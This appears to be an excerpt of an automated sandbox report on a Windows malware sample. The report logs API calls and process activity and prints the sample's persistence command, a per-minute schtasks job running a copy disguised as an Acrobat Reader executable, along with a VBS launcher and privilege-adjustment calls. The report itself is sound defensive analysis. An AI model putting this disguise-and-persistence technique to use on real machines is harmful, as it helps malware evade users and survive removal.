                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00B6ECBC
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1AC99 NtdllDialogWndProc_W,0_2_00B1AC99
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,0_2_00B1AD5C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6FE80 NtdllDialogWndProc_W,0_2_00B6FE80
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1AFB4 GetParent,NtdllDialogWndProc_W,0_2_00B1AFB4
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00B6EFA8
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_00B6FF91
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_00B6FF04
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00ED29C2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F0A1 SendMessageW,NtdllDialogWndProc_W,5_2_00F3F0A1
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_00F3F122
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F402AA NtdllDialogWndProc_W,5_2_00F402AA
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F3DA NtdllDialogWndProc_W,5_2_00F3F3DA
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F3AB NtdllDialogWndProc_W,5_2_00F3F3AB
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F37C NtdllDialogWndProc_W,5_2_00F3F37C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F45A ClientToScreen,NtdllDialogWndProc_W,5_2_00F3F45A
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F425 NtdllDialogWndProc_W,5_2_00F3F425
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00F3F5D0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F594 GetWindowLongW,NtdllDialogWndProc_W,5_2_00F3F594
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEB7F2 NtdllDialogWndProc_W,5_2_00EEB7F2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEB845 NtdllDialogWndProc_W,5_2_00EEB845
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3EA4E NtdllDialogWndProc_W,5_2_00F3EA4E
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_00F3ECBC
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEAC99 NtdllDialogWndProc_W,5_2_00EEAC99
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,5_2_00EEAD5C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FE80 NtdllDialogWndProc_W,5_2_00F3FE80
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEAFB4 GetParent,NtdllDialogWndProc_W,5_2_00EEAFB4
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_00F3EFA8
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,5_2_00F3FF91
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,5_2_00F3FF04
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B470AE: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B470AE
                Source: C:\Users\user\Desktop\bf-p2b.exeFile read: C:\Users\user\Desktop\bf-p2b.exeJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\bf-p2b.exe C:\Users\user\Desktop\bf-p2b.exe
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbsJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1Jump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: JWPING.lnk.0.drLNK file: ..\..\..\..\..\Windata\Softwarefx-Acrobat-Reader.exe
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3B8B0 AdjustTokenPrivileges,CloseHandle,0_2_00B3B8B0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B3BEC3
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F0B8B0 AdjustTokenPrivileges,CloseHandle,5_2_00F0B8B0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F0BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00F0BEC3
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
